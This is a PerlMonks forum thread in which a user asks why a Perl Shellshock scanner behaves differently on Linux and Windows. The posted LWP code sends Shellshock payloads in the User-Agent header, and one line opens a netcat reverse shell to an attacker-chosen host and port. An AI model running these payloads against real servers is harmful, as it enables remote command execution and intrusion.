Beefy Boxes and Bandwidth Generously Provided by pair Networks
Perl: the Markov chain saw
 
PerlMonks  

Re^2: Raw HTTP Request / Response

by Ghosty (Novice)
on Aug 24, 2018 at 11:11 UTC ( #1221011=note: print w/replies, xml ) Need Help??


in reply to Re: Raw HTTP Request / Response
in thread Raw HTTP Request / Response

$ua = new LWP::UserAgent; $ua->agent("$Inject; nc $bip $bport -e /bin/sh'"); $request = HTTP::Request->new('GET'); $request->url($url); $response = $ua->request($request); $code = $response->code; $headers = $response->headers_as_string; $body = $response->content;

I found that code which works fine on windows and the problem is on Unix it doesn't follow the =~ thingy Ok here:

sub PingInject{ $url = "$target"; $ua = new LWP::UserAgent; $ua->agent("() { :;}; /bin/bash -c 'ping -c 3 8.8.8.8'"); $ua->timeout(15); $request = HTTP::Request->new('GET'); $request->url($url); $response = $ua->request($request); $code = $response->code; $headers = $response->headers_as_string; $body = $response->content; if($body =~ /--- 8.8.8.8 ping statistics ---/){ print "[+] Shellshock Ping Injection was injected successfully! (Vul +nerable!) \n"; $injectionFound = "yes"; $InjectPoint = "() { :;}; /bin/bash -c 'ping -c 3 8.8.8.8'"; $Inject = "() { :;}; /bin/bash -c 'ping -c 3 8.8.8.8"; InjCorrect(); } else { print "[-] Shellshock Ping Injection was not injected successfully! +(Not Vulnerable!) \n"; } }

At the part where it says "=~ /--- 8.8.8.8 ping statistics ---/" on windows it does follow that statement but not on linux it just says the else statement... So any ideas on how to fix that?

Replies are listed 'Best First'.
Re^3: Raw HTTP Request / Response
by hippo (Canon) on Aug 24, 2018 at 11:29 UTC
    So any ideas on how to fix that?

    You don't "fix" that - it's an arbitrary command injection which your Linux installation correctly prohibits.

      Well i feel the most stupid guy in the world, my script works on linux and windows... on linux the problem is that i wasn't on the right WiFi.... So i couldn't reach up my virtualbox which was vulnerable to Shellshock for developing my tool... Now i'm on the correct WiFi and discovered a new injection with linux ...

      Sorry for wasting your time.. :( So conclusion it works on both but i wasn't on the correct wifi to reach my virtualbox machine...

      Well is there a way linux can execute and get the same results as windows?

Log In?
Username:
Password:

What's my password?
Create A New User
Node Status?
node history
Node Type: note [id://1221011]
help
Chatterbox?
and the web crawler heard nothing...

How do I use this? | Other CB clients
Other Users?
Others cooling their heels in the Monastery: (4)
As of 2019-04-24 14:16 GMT
Sections?
Information?
Find Nodes?
Leftovers?
    Voting Booth?
    I am most likely to install a new module from CPAN if:
















    Results (122 votes). Check out past polls.

    Notices?